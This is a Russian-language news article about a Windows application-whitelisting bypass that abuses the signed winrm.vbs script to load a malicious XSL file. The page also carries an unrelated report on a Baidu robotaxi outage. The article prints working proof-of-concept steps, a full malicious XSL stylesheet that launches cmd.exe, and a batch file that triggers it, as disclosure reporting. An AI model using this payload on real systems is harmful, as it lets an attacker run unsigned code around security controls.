В Windows найден метод обхода белых списков приложений

Олег Иванов 16 Июля 2018 - 08:51

...

В Windows найден метод обхода белых списков приложений

Исследователь в области кибербезопасности Мэтт Гребер нашел интересный метод обхода белых списков приложений в Windows. Помимо этого, эксперт описал технику выполнения произвольного неподписанного кода в winrm.vbs.

winrm.vbs (подписанный Windows скрипт в System32) способен выполнять контролируемый злоумышленником XSL, который не попадет под ограничения «enlightened script host», в результате это приведет к выполнению произвольного неподписанного кода.

«Если вы добавляете “-format:pretty” или “ -format:text” в winrm.vbs, он вытащит WsmPty.xsl или WsmTxt.xsl из каталога, в котором находится cscript.exe. Это значит, что атакующий может скопировать cscript.exe в нужное ему место, где находится вредоносный XSL», — пишет специалист.

«Благодаря этому киберпреступник может добиться выполнения произвольного неподписанного кода. Эта техника практически идентична описанному Кейси Смитом методу с использованием wmic.exe».

Что касается Proof-of-Concept, эксперт опубликовал следующие шаги:

Поместить вредоносный файл WsmPty.xsl или WsmTxt.xsl в контролируемую атакующим директорию.
Скопировать файл cscript.exe или wscript.exe в ту же самую директорию.
Выполнить winrm.vbs с «-format», указав «pretty» (если был помещен файл WsmPty.xsl) или «text» (если был помещен файл WsmTxt.xsl).

Исследователь привел пример вредоносного XSL, который можно поместить в контролируемый злоумышленником каталог. В качестве примера эксперт помещает файл по этому пути — C:\BypassDir\WsmPty.xsl.

<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
 <ms:script implements-prefix="user" language="JScript">
 <![CDATA[
 var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
 ]]> </ms:script>
</stylesheet>

Грамотное оформление вредоносного файла WsmPty.xsl должно включать использование встроенного пейлоада DotNetToJScript, приводящего к выполнению произвольного кода.

«В процессе помещения файла WsmPty.xsl можно использовать следующий пакетный файл для запуска пейлоада», — объясняет эксперт:

mkdir %SystemDrive%\BypassDir
copy %windir%\System32\cscript.exe %SystemDrive%\BypassDir
%SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty

Следующая главная новость »

Vulnerability Management 2026: что в управлении уязвимостями уже не работает?
Регистрируйтесь на эфир!

Екатерина Быстрова 02 Апреля 2026 - 11:27

Сбои программ Сбои оборудования Домашние пользователи Корпорации

Роботакси Baidu зависли и оставили пассажиров стоять в пробках

В китайском Ухане у Baidu произошёл крупный сбой в работе роботакси Apollo Go. По данным местной полиции, из-за системной неисправности на дорогах одновременно остановились более 100 беспилотных машин. Часть из них встала прямо посреди движения, из-за чего пассажиры оказались заблокированы в салоне, а на дорогах начались заторы и аварийные ситуации.

Судя по сообщениям очевидцев и публикациям в соцсетях, некоторые роботакси замирали прямо на скоростных магистралях и эстакадах, в том числе в быстрых полосах.

Одна из пассажирок рассказала WIRED, что вместе с друзьями провела в таком автомобиле около полутора часов: машина несколько раз давала сбой, а затем окончательно остановилась у перекрёстка. На экране появилось сообщение с просьбой оставаться внутри и ждать представителя компании, но помощь так и не приехала. В итоге пассажиры просто вышли сами.

Отдельное раздражение у людей вызвала поддержка. По словам пассажиров, дозвониться до сервиса было сложно, а кнопка SOS в отдельных случаях вообще не помогала. Некоторые пользователи писали, что им пришлось самостоятельно выбираться из машины, пока сзади уже скапливался поток.

Без ДТП тоже не обошлось. По данным AP и WIRED, пострадавших не было, но в соцсетях появлялись сообщения как минимум о нескольких столкновениях с остановившимися роботакси.

Один из водителей, например, рассказал, что врезался в машину Apollo Go после того, как ехавший впереди автомобиль резко перестроился, чтобы её объехать.

Сама Baidu в феврале сообщала, что её роботакси уже выполнили 20 млн поездок и проехали более 300 млн километров, а сервисы компании работают более чем в десятке городов Китая и выходят на зарубежные рынки, включая Абу-Даби, Дубай и Сеул.

Vulnerability Management 2026: что в управлении уязвимостями уже не работает?
Регистрируйтесь на эфир!